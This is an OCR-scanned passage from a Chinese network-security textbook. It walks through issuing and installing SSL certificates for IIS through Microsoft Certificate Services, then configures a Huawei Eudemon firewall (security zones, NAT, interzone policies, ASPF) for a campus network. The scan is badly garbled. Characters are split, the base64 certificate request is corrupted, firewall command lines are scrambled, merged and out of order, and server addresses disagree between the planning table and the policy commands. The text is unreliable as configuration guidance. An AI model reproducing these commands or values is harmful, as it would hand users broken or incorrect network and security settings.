0.55/certsrv( 假 设 Web 站 点 的 IP 地址 为 192. 168. 0. 55) ,将 出 现 申 请 证 书 界面 ,如 图 6-59 
所 示 o 


HE] http: //192. 168. 0. 55/ cer tsrv/ 





Hicrosoft 证 书 服务 一 hacz 










使 用 此 网 站 为 您 的 Web 浏览 器 ， E MEAN 
zr 通过 使 用 证 书 ， 您 可 以 向 通过 Web 通信 的 人 确认 您 
mur ewm 并 且 ， 根 据 您 申请 的 证 书 的 类 型 ， ER 


吊销 列表 (CRL) ， 或 查看 挂 起 的 申请 的 状态 
有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文档 . 
选择 一 个 任务 : 

申请 一 个 证 书 


的 证 书 申请 的 状态 
下 载 一 个 CA 证 书 ， 证 书 链 或 CRL 


| 
ETOLA REPASA T ARIE RARUA CATES, 证 书 链 ， 或 证 书 | 





























图 6-59 申请 证 书 
单 击 “申请 一 个 证 书 " 链 接 , 再 单 击 “ 高 级 申请 "链接 ,将 出 现 图 6-60 所 示 界 面 。 


Ë http: //192. 168. 0. 55/ certsrv/certraad. asp 
Kicrosoft 证 书 服务 一 
高 级 证 书 申请 


CA 的 策略 决定 您 可 以 申请 的 证 书 类 别 。 单 击 下 列 选项 之 一 来 : 
创建 并 向 此 CA 一 个 申请 。 
使 用 base64 编码 的 CHC sk PKCS #10 文件 提交 一 个 证 书 申 








请， 或 使 用 base64 编码 的 PKCS #7 文件 续 订 证 书 申请 














图 6-60 高 级 证 书 申请 


~ 
N 
3 
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(4) 单 击 “ 使 用 base-64 编码 的 CMC 或 PKCS # 10 文件 提交 一 个 证 书 申请 ,或 使 用 
base64 编码 的 PKCS#7 文件 续 订 证 书 申请 ”链接 ,将 出 现 如 图 6-61 所 示 的 界面 。 



































文件 四 Gc SEQ KAW IRAD 帮助 加 | t 
om -o-na b| Og ar o| Q 之 国 "- 0 站 
EQ [i] http://192. 168. 0.55/certsrv/certraxt. asp EE [mm 


NHicrosoft 证 书 服务 





提交 一 个 证 书 申请 或 续 订 申请 


要 提交 一 个 保存 的 申请 到 CA， 在 “保存 的 申请 “ 框 中 粘贴 一 个 
由 外 部 源 ( 如 Web 服务 器 ) 生 成 的 base-64 编码 的 CMC 或 
PKCS #10 证 书 申请 或 PKCS #7 续 订 申请 。 





保存 的 申请 








Base-64 编码 的 
证 书 申请 

(CNC 或 

PKCS #10 或 


PKCS #7): [2 
x x 


浏览 要 插入 的 文件 。 
附加 属性 : 





属性 : 











图 6-61 提交 证 书 申请 
打开 步骤 (2) 在 C 盘 生 成 的 文件 ,全 选 并 复制 ,如 图 6-62 所 示 。 


文件 下) RGO dex 查看 WD WB QD 
BEGIN NEW CERTIFICATE REQUEST 

MI IDHzCCApuCRQRwWDELHAKGRTUEBhHCQOnxDTRLBgNUBRgTBGhhY3oxCzR JBgNU 
BRcTanp6MQOuCuvDUQQKEuRoYVNÓHQ OuCuYDUQQLEvRAeGd j MQ8uDQVDUQQDEuzu)| 

RuOD Iug28uDQYJKo2 IhvcNRQEBBQRDGY ORMIGJROGBRKBqxrHq012HnuibDCqs| 
SrP7zFRUHuHUNSrTdB jyzCU7 jNUSkdKhhuEPPx 0v.Jap9RquGtkeIaBrPdCyUF85u| 
rHXueüdt jF51nbbBHxzóHbónbuyHB3VZ IRDJEHkEDPi It1BnFi CgF /03aCvi ukdH| 
vgDXxCik8Dy9n7FncmU3EgFuRgHBRRGgggGZHBoGCi sGRQQBg j cNagHxDBYKNS Ay 
LjH30TRuMjB7BgorBgEERYI3RQEOMMOVazROBgNUHQSBRFSEBRHCBPRURRYJKoZI 
hucNAQkPBDcwNTAOBggqhkiG9wBDAgICAIAwDgYIKoZIhucNAwQCAgCAMACGBSSO| 
AwIHMAOGCCqGSIb3DQHHMBMGA1UdJQQMMAOGCCSGAQUFBwMBMIH9BgorBgEEAYIS| 
DQICMYHUMIHrAgEBH1oATQBpAGMAcgBuAHMAbwBnAHQAIABSAFMAQQAgAFMAQwBo| 
AGEAbgBuAGUAbAAgAEHACgBSAHAAdABvAGCAcgBhAHAAaABpAGMAIABQAHIAbDwB2| 
AGKAZABIAHIDJYKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA| 
hnnnnRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRH| 
nnnnhnnnnnnnhhnnnnnnnhhhhnnhhnRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRH| 
nnnnnD8NBgkqhkiG9weBnQUFan0BgQByzrrNEUVBda313qZhKiyGuj+wx9HLmcu9q| 
hnE*+uwPhXOcDKZc*Xguo7hnKB5iJdeFkopQpnfaNK1c2I3Xufkti19tftRNZnpPws| 
zaGxIohMJ4QUgXo5Sux1p*3qS/vHYJcPFomes6sbunnDqrDAKFNuj4IeDYuu0qkj 
SbT5ru5geA==| 
-----END NEM CERTIFICATE REQUEST 











6-62 $l certreq. txt 文件 内 容 


(5) 把 证 书 请 求 文件 粘贴 在 申请 栏 内 ,如 图 6-63 所 示 。 
单 击 “ 提 交 ” 按 钮 ,证 书 申请 收 到 ,等 待 管 理 员 颁发 ,如 图 6-64 所 示 。 
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提交 一 个 证 书 申请 或 续 订 申请 


要 提交 一 个 保存 的 申请 到 CA， 在 “保存 的 申请 ” 框 中 粘贴 一 个 
由 外 部 源 ( 如 Web 服务 器 ) 生 成 的 base-64 编码 的 CMC 或 
PKCS #10 证 书 申请 或 PKCS #7 续 订 申请 。 


保存 的 申请 : 






AAAAADANBgkqhkiG9v0BAQUF AAOBgQByzrrNEyBd, 
Base-64 编码 的 |A4E*vwvPAXOCDKZc4XOvo/hAKBSiJdOFkODQpnfaN 
证 书 申 i zaGxIohMJ4QUgZo5Svx1p+3qS/vHYJcPFomeS6sb' 
(CHC ISbT5ruSg0A-- 

PKCS $10 或 |---——END NEU CERTIFICATE REQUEST----- 

















AIDE SW CSSIONE 但 是 ， 您 必须 等 符 管理 员 颁发 您 申请 





您 的 申请 Id 为 2。 
请 在 一 天 或 两 天 内 返回 此 网 站 以 检索 您 的 证 书 。 
注意 : 您 必须 用 此 web 浏览 器 在 10 天 内 返回 以 检索 您 的 证 书 
ese o ë [ù ù me 7: 
图 6-64 证 书 挂 起 

(6) 在 “开始 "菜单 中 ,选中 “证 书 颁发 机 构 ” 命 令 , 在 弹出 窗口 的 左 侧 窗 格 中 选择 “ 挂 起 
的 申请 ”选项 ,把 刚才 主机 申请 的 证 书 “ 颁 发 ", 如 图 6-65 所 示 。 

返回 申请 证 书 主页 , 单 击 “ 查 看 挂 起 的 证 书 申请 的 状态 ”链接 ,如 图 6-66 所 示 。 

CD 单 击 “ 保 存 的 申请 证 书 ” 链 接 , 如 图 6-67 所 示 。 
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ESOS EEV 帮助 op) 
= e > em D Beem 

















图 6-65 ”颁发 证 书 


[E] http://192. 168. 0. 5S/ cer ter v 


Hicrosoft 证 书 服务 一 





欢迎 


ERU Web 浏览 器 ， 电 子 邮 件 客户 端 或 其 他 程序 申 
pm 个 证 书 。 使 用 证 书 ， 您 可 以 向 通过 Web 通信 的 人 确认 
的 身份 签署 并 加 密 邮 件 ， 并 且 ， 根 据 您 申请 的 证 书 的 类 

型 ， 执 行 其 他 安全 任务 。 


A TRIE RIRN td 证 书 链 ， 或 
证 书 吊 销 列表 (CRL) ， 或 查看 挂 起 的 申请 的 状态 ， 


有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文档 . 
选择 一 个 任务 : 
申请 一 个 证 书 


查看 挂 起 的 证 书 申请 的 状态 
下 载 一 个 CA 证 书 ， 证 书 链 或 CRL 














6-66 证 书 状 态 


选中 “Base 64 编码 " 单 选 按钮 , 单 击 “ 下 载 证 书 ” 链 接 , 如 图 6-68 所 示 。 
(8) 命名 证 书 并 保存 ,如 图 6-69 所 示 。 
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查看 挂 起 的 证 书 申请 的 状态 


请 选择 您 要 查看 的 证 书 申请 : 
保存 的 申请 证 书 (2011 年 8 月 26 日 12:50:17) 











证 书 已 颁发 
您 申请 的 证 书 已 颁发 给 您 。 
CDER 编码 或 “Base 64 编码 





图 6-69 证 书 命名 
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回 到 “Internet 服务 管理 器 ”窗口 ,选中 “默认 网 站 属性 ”, 在 弹出 的 对 话 框 中 选择 “目录 
安全 性 ”选项 卡 , 单 击 “ 服 务 器 证 书 ” 按 钮 ,选中 “处 理 挂 起 的 请 求 并 安装 证 书 ” 单 选 按钮 , 选 
择 证 书 文件 要 保存 的 “位 置 ” 和 "名 称 ”, 定 义 “SSL 端口 为 443, 完 成 安装 ,如 图 6-70 一 
图 6-74 所 示 。 





6-71 处 理 挂 起 


(9) 切记 不 能 忽略 还 要 在 服务 器 端 安装 CA 的 证 书 路 径 ,在 如 图 6-75 所 示 的 页 面 中 单 
i" FAR CA 证 书 ” 连 接 , 并 选择 安装 此 CA 证 书 路 径 。 

(10) 回 到 “Internet 服务 管理 器 "窗口 ,设置 “默认 网 站 属性 ”对 话 框 ,其 中 “SSL 端口 ”为 
443 ,如 图 6-76 所 示 。 
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[D  VUserData Administrator (ÑA certnew.cer 





图 6-72 位 置 名 称 


SSL 端口 
为 此 网 站 指定 SSL 端口 。 





图 6-73 SSL 端口 


完成 Web 服务 器 证 书 向 导 





已 成 功 完成 Web 服务 器 证 书 向 导 。 
此 服务 器 上 现在 已 安装 了 证 书 。 
如 果 格 来 需要 更 新 、 苦 的 或 出 除 证 书 ， 可 以 重新 运行 向 导 。 


单 击 “ 完 成 ” 控 钱 关闭 向 导 。 








6-74 Web 服务 器 证 书 
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— Microsoft Internet Explorer 










下 载 CA 证 书 、 证 书 链 或 _ CRL 
要 信任 从 这 个 证 书 颁 发 机 构 颁发 的 证 书 ， 安 装 此 CA 证 书 链 。 


要 下 载 一 个 CA 证 书 、 证 书 链 或 CRL， 选 择 证 书 和 编码 方法 。 
CA 证 书 : 


编码 方法 : m 


€ DER 
C Base 64 








图 6-76 站 点 属性 


在 图 6-76 所 示 对 话 框 中 ,选择 “目录 安全 性 ”选项 卡 , 单 击 “ 安 全 通信 ”选项 区 域 的 “ 编 
辑 " 按 钮 ,打开 “安全 通信 ”对 话 框 , 按 图 6-77 所 示 进 行 配置 。 
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图 6-77 “安全 通信 "配置 


2. 设置 浏览 器 客户 端 

CD 浏览 器 客户 端 同样 要 到 同一 个 证 书 服务 器 中 申请 证 书 , 如 图 6-78 所 示 , 进 入 申请 
证 书 主页 , 单 击 * 申 请 一 个 证 书 ” 链 接 。 

(2) 选中 “用 户 证 书 申请 ”, 单 击 “Web 浏览 器 证 书 ” 链 接 , 如 图 6-79 所 示 。 

填写 好 需要 的 名 称 ,等 待 证 书 的 颁发 ,如 图 6-80 所 示 。 

(3) 等 待 证 书 服务 器 颁发 证 书 , 如 图 6-81 所 示 。 

(4) 回 到 证 书 服务 器 ,颁发 浏览 器 申请 的 证 书 , 操 作 方 法 同 前 。 返 回 浏览 器 客户 端 ,再 
次 连接 证 书 服务 器 主页 , 单 击 “ 查 看 挂 起 的 证 书 申请 的 状态 ”链接 ,如 图 6-82 所 示 。 

保持 默认 设置 不 变 , 单 击 " Web 浏览 器 证 书 ” 链 接 , 如 图 6-83 所 示 。 

(5) 安装 Web 浏览 器 证 书 部 分 完毕 ,返回 ,在 第 (4) 步 第 一 图 所 示 界 面 中 选中 “下 载 CA 
证 书 ”, 单 击 “ 下 一 步 ”按钮 ,进入 图 6-84 所 示 的 界面 。 
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入 Wi crosoft 证 书 服务 - icrosoft Internet Explerer 





x SED SFV wao IAD SB | e 





OsR-O- c Pme mx O6|C- s (d- LA i 
HAED fE) sv: //192 168.0. ss/ center esu 











xim 





使 用 此 网 站 为 您 的 Web 浏览 器 ， 电 子 邮 件 客户 端 或 其 他 程序 申请 一 个 证 书 。 通 过 
使 用 证 书 ， 和 您 可 以 向 通过 Web 通信 的 人 确认 您 的 身份 ， 签 署 并 加 密 邮 件 ， 并 且 ， 
根据 您 申请 的 证 书 的 类 型 ， 执 行 其 他 安全 任务 。 


您 也 可 以 使 用 此 网 站 下 载 证 书 颁发 机 构 (CA) 证 书 ， 证 书 链 ， 或 证 书 吊销 列表 
(CRL)， 或 查看 挂 起 的 申请 的 状态 。 


有 关 证 书 服务 的 详细 信息 ， 清 参阅 证 书 服务 文档 
选择 一 个 任务 : 
申请 一 个 证 书 


查看 挂 起 的 证 书 申请 的 状态 
下 载 一 个 CA 证 书 ， 证 书 链 或 CRL 








图 6-78 浏览 器 端 申请 证 书 










四 
ORE -Oa me ww ODO.» 








申请 一 个 证 书 











xi wem FEV emo IAV Sb 
QmR-O-iJic|Pss mE G|C- v (d9- oA 


Mig) SE) stp: //192. 169.0. 55/eertsrv/certrqbi asp?type=0 DEL 





Nicrosoft 





Web 浏览 器 证 书 - 识别 信息 





要 完成 您 的 证 书 ， 在 下 面 的 框 中 输入 要 求 的 信息 。 
姓名 : [sholi 

电子 邮件 : FEhbiGizEcm | 
公司 : [hacz 
sm: fogd J 














图 6-80 填写 名 称 


286 


网 络 安全 技术 (第 2 版 ) 





ET 
文件 四 B) SEV KEW IAV 8500 
O m - O - NAOR mx @ | O- 2 M- 





Bib) fE) http: //192_168_0_S5/certsrv/certfnsh asp 


如 crosoft 证 书 服务 一 


证 书 挂 起 








您 的 证 书 申请 已 经 收 到 。 但 是 ， 您 必须 等 符 管理 员 颁发 您 申请 的 证 书 。 
您 的 申请 Id 为 3。 














请 在 一 天 或 两 天 内 返回 此 网 站 以 检索 您 的 证 书 。 
注意 : 您 必须 用 此 Web 浏览 器 在 10 天 内 返回 以 检索 您 的 证 书 





6-81 证 书 挂 起 







ELG 
LPD REO SEV dO) IAD WMU 
Ome - O - ) 2) G | D mm mx @ | oO sid- U P Ë 


Hit [e] http://192. 168. 0. S55/certsrv/ ] gra 









Kicrosoft 证 书 服务 一 hacz 





欢迎 


使 用 此 网 站 为 您 的 Web 浏览 器 ， 电 子 邮件 客户 端 或 其 他 程序 申请 一 个 证 书 。 通 过 
使 用 证 书 ， 您 可 以 向 通过 Web 通信 的 人 确认 您 的 身份 ， 签 署 并 加 密 邮 件 ， 并 且 ， 
根据 您 申请 的 证 书 的 类 型 ， 执 行 其 他 安全 任务 。 


ISTA SUCUS HARI DEDEEUR COUPS, 证 书 链 ， 或 证 书 吊销 列表 
(CRL) ， 或 查看 挂 起 的 申请 的 状态 


有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文档 . 
选择 一 个 任务 : 
申请 一 个 证 书 


查看 挂 起 的 证 书 申请 的 状态 
下 载 一 个 CA 证 书 ， 证 书 链 或 CRL 

















6-82 EERS 


Bicrosoft IBERS - Hicrosoft Internet Explorer = DI x 
XED RED SEV KEW IAV Wb | e 
O SE - Ə - 3) 2) b| D mg wx eO wig- 0A 























HEW [Ë] http: //192. 168.0. 55/certsrv/cer tekpn asp 
paeemEIS TE 
查看 挂 起 的 证 书 申请 的 状态 


请 选择 您 要 查看 的 证 书 申请 : 
Web 浏览 器 证 书 (2011 年 8 月 26 日 13:41:44) 














图 6-83 证 书 已 颁发 
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图 6-84 安装 证 书 
单 击 “ 安 装 此 证 书 "链接 ,如 图 6-85 所 示 ,CA 证 书 安装 完毕 。 


证 书 已 安装 
您 的 新 证 书 已 经 成 功 安装 。 





图 6-85 安装 完毕 
打开 IE 浏览 器 ,选择 * 工 具 ”|*Internet 选项 "命令 ,打开 “Internet 选项 ”对 话 框 ,在 该 对 
话 框 的 “内 容 ” 选 项 卡 中 , 单 击 “ 证 书 ” 按 钮 ,打开 “让 书 ” 对 话 框 ,在 “个 人 ”选项 卡 中 ,可 以 看 到 
shbli 证 书 , 如 图 6-86 所 示 。 








6-86 shbli 证书 保存 位 置 
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(6) 以 http 方式 访问 默认 站 点 ,出 现 如 图 6-87 所 示 的 提示 。 





该 页 必须 通过 安全 通道 查看 


悠 试图 沪 问 的 页 面 使 用 安全 套 接 字 层 CSL) 进行 保护 。 





请 尝试 以 下 操作 : 
。 在 您 要 访问 的 地 址 前 键入 https:// 并 按 Enter. 


MITP 错误 403.4 - 禁止 访问 : 需要 使 用 SSL 查看 该 资源 。 
Internet 信息 服务 IS) 


技术 信息 ( 为 技术 支持 人 员 提 供 ) 


e 转 到 Microsoft 产品 支持 服务 并 搜索 包括 “HTTP” 和 “403” 的 标题 
€ 打开 “IIS 帮助 ”( 可 在 IIS 管理 器 (inetngr) 中 访问 ) ,然后 搜索 标题 为 “ 关 
于 安全 ”、“ 安 全 套 接 字 屋 (SSL)” 和 “关于 自 定 义 错误 消息 ”的 主题 。 





图 6-87 拒绝 访问 


以 https:// 的 方式 访问 默认 站 点 ,连接 成 功 , 进 入 服务 器 的 Web 页 面 ,浏览 器 右 下 角 出 
现 一 个 小 锁 , 如 图 6-88 所 示 。 


A 





建设 中 
您 想 要 查看 的 站 点 当前 没有 默认 页 。 可 能 正在 对 它 进行 升级 和 配置 操作 。 


请 稍 后 再 访问 此 站 点 。 如 果 您 仍然 过 到 问题 ， 请 与 网 站 的 管理 员 联系 。 





如 果 您 是 网 站 的 管理 员 ， 并 且 认 为 您 是 由 于 错误 才 收 到 此 消息 ， 请 参阅 TIS 
夫 助 中 的 “启用 和 茜 用 动态 内 容 ”。 


要 访问 IIS 帮助 


单 击 开始 ， 然 后 单 击 运行 . 

在 打开 文本 框 中 , 键入 inetagr. HHN IIS 管理 器 
. 从 攻 助 菜单 ， 单 击 帮助 主题 

单 击 Internet 信息 服务 。 


sune 











图 6-88 安全 访问 成 功 


打开 中 国 建设 银行 网 络 银 行 网 站 ,浏览 器 右 下 角 出 现 一 个 小 锁 , 如 图 6-89 所 示 。 
(7) 用 SSL 加 密 后 通过 监视 器 捕获 加 密 帧 ,如 图 6-90 所 示 。 
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6-89 ”银行 网 站 案例 
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图 6-90 ”捕获 SSL 加 密 数据 
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7.1 组 网 需求 


CD 学 校 有 校内 用 户 约 500 个 .提供 对 外 访问 的 服务 器 两 台 。 校 内 用 户主 要 分 布 在 教 
学 楼 和 宿舍 区 ,校内 两 台 提 供 对 外 访问 的 服务 器 分 布 在 图 书馆 ,是 该 校 主页 .招生 及 资源 共 
享 等 网 站 。 

(2) 学 校 分 别 通过 两 个 不 同 运营 商 链 路 连接 到 Internet, 带 宽 都 是 100Mb/s。 两 个 运营 商 
ISP1,ISP2 分 别 为 该 校 分 配 了 5 个 IP 地 址 。ISP1 分 配 的 IP 地址 是 200. 1. 1. 1 一 200. 1. 1. 5. 
ISP2 分 配 的 IP 地 址 是 202. 1. 1. 1 一 202. 1. 1. 5. ISP1 提供 的 接 入 点 为 200. 1. 1. 10,ISP2 
提供 的 接 入 点 为 202. 1. 1. 10。 该 学 校 网 络 需 要 实现 以 下 需求 。 

CD 校内 用 户 能 够 通过 两 个 运营 商 访 问 Internet, 且 为 了 提高 访问 速度 ,将 需要 去 往 不 同 
运营 商 的 流量 分 别 由 连接 两 个 运营 商 网 络 的 接口 转发 。 当 一 条 链 路 出 现 故 障 时 ,能 够 保证 
流量 及 时 切换 到 另 一 条 链 路 ,避免 网 络 长 时 间 中 断 。 

© 校内 用 户 和 校外 用 户 都 能 够 访问 学 校 提供 对 外 访问 的 服务 器 。 

C) 由 于 该 学 校 P2P 流量 较 大 ,对 网 络 影响 严重 ,需要 对 校内 用 户 进行 P2P 限 流 。 

© 需要 保护 内 部 网 络 不 受到 SYN Flood, UDP Flood 和 ICMP Flood 的 攻击 。 


7.2 网 络 规划 


根据 校园 网 络 情况 和 需求 ,网 络 规划 如 下 。 

CD 为 了 实现 校园 网 用 户 使 用 有 限 公 网 IP 地 址 接 入 Internet ,需要 配置 NAPT 方式 的 
NAT ,借助 端口 将 多 个 私 网 TP 地 址 转换 为 有 限 的 公 网 IP 地 址 。 由 于 校园 网 连接 两 个 运营 
商 , 因 此 需要 分 别 进 行 地 址 转换 ,将 私 网 地 址 转换 为 公 网 地 址 , 即 创建 两 个 安全 区 域 ISP1 和 
ISP2( 安 全 优先 级 低 于 DMZ 区 域 ) ,并 分 别 在 Trust-ISP1 域 间 、Trust-ISP2 域 间 配 置 NAT 
outbound, 

(2) 为 了 实现 去 往 不 同 运营 商 的 流量 由 对 应 接口 转发 ,需要 收集 ISPI 和 ISP2 所 属 网 
段 的 信息 ,并 配置 到 这 些 网 段 的 静态 路 由 。 使 去 往 ISP1 的 流量 通过 连接 ISP1 的 接口 转发 ， 
去 往 ISP2 的 流量 通过 连接 ISP2 的 接口 转发 。 为 了 提高 链 路 可 靠 性 ,避免 业务 中 断 ,需要 配 
置 两 条 默认 路 由 。 当 报 文 无 法 匹配 静态 路 由 时 ,通过 默认 路 由 发 送 给 下 一 跳 。 

(3) 由 于 图 书馆 的 服务 器 部 署 在 内 网 ,其 IP 地 址 为 私 网 了 了 地址 。 如 果 想 对 校外 用 户 
提供 服务 ,就 需要 将 服务 器 的 私 网 IP 地 址 转换 为 公 网 IP 地 址 , 即 分 别 基 于 ISP1、ISP2 区 域 
配置 NAT Server, 








pa 
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(4) 由 于 运营 商 提供 给 该 学 校 的 带宽 为 2X100Mb/s, 为 了 保证 其 他 业务 不 受 影响 ,将 
P2P 流量 限制 在 30Mb/s。 

(5) 在 Eudemon 上 启用 攻击 防范 功能 ,保护 校园 网 内 部 网 络 。 网 络 规划 后 的 组 网 如 
图 7-1 和 表 7-1 所 示 。 










汇聚 交换 机 


Eudemon 





安全 区 域 : ISPI 


接 入 交换 机 
安全 区 域 : Trust i 
1 





Web 服 务 器 LJ 
FTP 服 务 器 
安全 区 域 : DMZ 
图 7-1 网 络 规划 组 网 示意 图 
表 7-1 网 络 规划 表 
项 目 数 gd 说 — H 
a» 接口 号 : GigabitEthernet0/0/3 GigabitEthernet 0/0/3 是 连接 内 网 汇 
IP 地址 : 10.1.1.1/16 聚 交 换 机 的 接口 。 
安全 区 域 : Trust 校内 用 户 分 配 到 网 段 为 10. 1. 0. 0 
255. 255. 0. 0 的 私 网 地 址 , 部署 在 
Trust 区 域 
(2) 接口 号 : GigabitEthernet0/0/1 GigabitEthernet 0/0/1 是 连接 图 书馆 
IP 地 址 : 192. 168. 1. 1/24 服务 器 的 接口 。 
安全 区 域 : DMZ 图 书馆 区 部 署 在 DMZ 区 域 
(3) 接口 号 : GigabitEthernet0/0/2 GigabitEthernet 0/0/2 是 连接 ISP1 的 
IP 地 址 : 200. 1. 1. 1/24 接口 ,去 往 ISP1 所 属 网 段 的 数据 通过 
安全 区 域 : ISP1 GigabitEthernet 0/0/2 转发 。ISP1 接 
安全 优先 级 : 15 入 点 的 IP 地 址 为 200. 1. 1.10 
(4) 接口 号 : GigabitEthernet0/0/4 GigabitEthernet 0/0/4 是 连接 ISP2 的 
IP 地 址 : 202. 1. 1. 1/24 接口 。 去 往 ISP2 所 属 网 段 的 数据 通过 
安全 区 域 : ISP2 GigabitEthernet 0/0/4 转发 。ISP2 接 
安全 优先 级 : 20 入 点 的 IP 地址 为 202. 1. 1.10 
Web 服务 器 内 网 IP; 192. 168. 1.5 对 于 ISP1 所 属 网 段 的 外 部 用 户 , Web 
转换 成 的 ISP1 的 公 网 IP. 服务 器 的 IP 地 址 为 200. 1. 1.4 
200.1.1.4 对 于 ISP2 所 属 网 段 的 外 部 用 户 , Web 


转换 成 的 ISP2 的 公 网 IP: 202.1.1.4 服务 器 的 IP 地 址 为 202. 1. 1.4 
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项 目 数 d 


说 m" 





FTP 服务 器 内 网 IP: 192. 168. 1. 10 
转换 成 的 ISP1 的 公 网 IP: 200.1.1.5 
转换 成 的 ISP2 的 公 网 IP: 202.1.1.5 


ISP1 分 配给 学 校 的 IP 地 址 200. 1. 1. 1 一 200.1.1.5 


ISP2 分 配给 学 校 的 IP 地 址 202.1.1.1 一 202.1.1.5 


对 于 ISP2 所 属 网 段 的 外 部 用 户 ,FTP 
服务 器 的 IP 地 址 为 200. 1. 1.5 

对 于 ISP2 所 属 网 段 的 外 部 用 户 ,FTP 
服务 器 的 IP 地 址 为 202. 1. 1.5 

其 中 200. 1. 1. 1 用 作 Eudemon 的 出 
接口 地 址 ,200. 1.1.2 和 200.1.1.3 用 
作 TrustrISP1 域 间 NAT 地 址 池 1 的 
地 址 

其 中 202. 1. 1. 1 用 作 Eudemon 的 出 
接口 地 址 ,202.1.1.2 和 202.1.1.3 用 
作 Trust-ISP2 域 间 的 NAT 地 址 池 2 
的 地 址 


7.3 P fE 2b UR 


(1) 配置 Eudemon 各 接口 的 IP 地 址 并 将 接口 加 入 安全 区 域 。 


# 配 置 Eudemon 各 接口 的 IP 地 址 


< Eudemon > system - view 


Eudemon - GigabitEthernet0/0/3] quit 
Eudemon] interface GigabitEthernet 0/0/1 


Eudemon - GigabitEthernet0/0/1] quit 

Eudemon] interface GigabitEthernet 0/0/2 

Eudemon - GigabitEthernet0/0/2] ip address 200.1.1.1 24 
Eudemon - GigabitEthernet0/0/2] quit 

Eudemon] interface GigabitEthernet 0/0/4 

Eudemon - GigabitEthernet0/0/4] ip address 202.1.1.1 24 
Eudemon - GigabitEthernet0/0/4] quit 

# 4ff GigabitEthernet 0/0/3 接口 加 入 Trust 安全 区 域 
Eudemon] firewall zone trust 





Eudemon - zone - trust] quit 
井 将 GigabitEthernet 0/0/1 接口 加 入 DMZ 安全 区 域 


Eudemon] firewall zone dmz 
Eudemon - zone - dmz] quit 


Eudemon] firewall zone name ispl 


Eudemon- zone - ispl] set priority 15 





Eudemon- zone — ispl] quit 


Eudemon- zone - dmz] add interface GigabitEthernet 0/0/1 


Eudemon] intEudemon - GigabitEthernet0/0/3 ip address 10.1.1.1 16 


Eudemon - GigabitEthernet0/0/1] ip address 192.168.1.1 24 


Eudemon- zone - trust] add interface GigabitEthernet 0/0/3 


# 创 建安 全 区 域 ISP1, 并 将 GigabitEthernet 0/0/2 接口 加 入 ISPl 


Eudemon- zone — isp1] add interface GigabitEthernet 0/0/2 
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井 创 建安 全 区 域 ISP2, 并 将 GigabitEthernet 0/0/4 接口 加 入 ISP2 
Eudemon] firewall zone name isp2 

Eudemon- zone - isp2] set priority 20 

Eudemon - zone - isp2] add interface GigabitEthernet 0/0/4 
Eudemon - zone - isp2] quit 


(2) 配置 域 间 包 过 滤 及 ASPF 功能 ,对 校内 外 数据 流 进 行 访问 控制 。 


# 配置 Trust-ISP1 的 域 间 包 过 滤 , 允许 校内 用 户 访问 ISP1 

Eudemon] policy interzone trust ispl outbound 

Eudemon - policy- interzone- trust ~ ispl- outbound] policy 1 

Eudemon- policy- interzone - trust ~ ispl - outbound- 1]policy source 10.1.0.00.0.255.255 
Eudemon - policy- interzone- trust - ispl- outbound - 1] action permit 

Eudemon - policy- interzone- trust ~ ispl ~ outbound - 1] quit 

Eudemon - policy- interzone- trust - ispl ~ outbound] quit 

# 配 置 Trust-ISP2 的 域 间 包 过 滤 , 允许 校内 用 户 访问 ISP2 

Eudemon] policy interzone trust isp2 outbound 

Eudemon - policy- interzone - trust ~ isp2 - outbound] policy 1 

Eudemon - policy- interzone - trust ~ isp2 - outbound - 1] policy source 10.1.0.0 0.0.255.255 
Eudemon - policy- interzone- trust - isp2 - outbound - 1] action permit 

Eudemon - policy- interzone- trust - isp2 - outbound - 1] quit 

Eudemon - policy- interzone- trust - isp2 - outbound] quit 

# ñ W: ISP1-DMZ 的 域 间 包 过 滤 , 允许 校外 用 户 访 问 DMZ 区 域 的 服务 器 (注意 Policy 配置 目的 地 址 为 
服务 器 的 内 网 地 址 ) 

Eudemon] policy interzone dmz ispl inbound 

Eudemon - policy- interzone - dmz - ispl - inbound] policy 1 

Eudemon - policy- interzone - dmz - ispl - inbound - 1]policy destination 192.168.1.50 
Eudemon - policy- interzone- dmz - ispl - inbound - 1]Policy destination 192.168.1.100 
Eudemon- policy- interzone- dmz - ispl - inbound - 1] action permit 

Eudemon - policy- interzone- dmz - ispl - inbound - 1] quit 

Eudemon - policy- interzone- dmz - ispl - inbound] quit 

# 配置 ISP2-DMZ 的 域 间 包 过 滤 , 允许 校外 用 户 访 问 DMZ 区 域 的 服务 器 (注意 Policy 配置 目的 地 址 为 
服务 器 的 内 网 地 址 ) 

Eudemon] policy interzone dmz isp2 inbound 

Eudemon - policy- interzone - dmz - isp2 - inbound] policy 1 

Eudemon- policy- interzone - dmz - isp2 - inbound - 1] policy destination 192.168.1.50 
Eudemon - policy- interzone- dmz - isp2 - inbound - 1]policy destination 192.168.1.100 
Eudemon - policy- interzone- dmz - isp2 - inbound - 1] action permit 

Eudemon - policy- interzone- dmz - isp2 - inbound - 1] quit 

Eudemon - policy- interzone- dmz - isp2 - inbound] quit 

# BOUE Trust-DVZ 的 域 间 包 过 滤 , 允许 校内 用 户 访问 服务 器 

Eudemon] policy interzone trust dmz outbound 

Eudemon - policy- interzone - trust - dmz ~ outbound] policy 1 

Eudemon - policy- interzone - trust ~ dmz - outbound - 1]policy source 10.1.0.0 0.0.255.255 
Eudemon - policy- interzone- trust - dmz — outbound- 1] policy destination 192.168.1.5 0 
Eudemon - policy- interzone- trust - dmz - outbound- 1] policy destination 192.168.1.100 
Eudemon - policy- interzone- trust - dmz — outbound - 1] action permit 

Eudemon - policy- interzone- trust - dmz - outbound- 1] quit 





Eudemon - policy- interzone- trust — dmz — outbound] quit 


294 网 络 安全 技术 (第 2 版) 





井 在 域 间 开启 ASPF 功能 ,防止 多 通道 协议 无 法 建立 连接 
Eudemon] firewall interzone trust ispl 
Eudemon- interzone- trust - ispl] detect ftp 
Eudemon- interzone- trust - ispl] detect qq 
Eudemon- interzone- trust - ispl] detect msn 
Eudemon- interzone- trust - ispl] quit 
Eudemon] firewall interzone trust isp2 
Eudemon- interzone- trust - isp2] detect ftp 
Eudemon- interzone- trust - isp2] detect qq 
Eudemon- interzone- trust - isp2] detect msn 
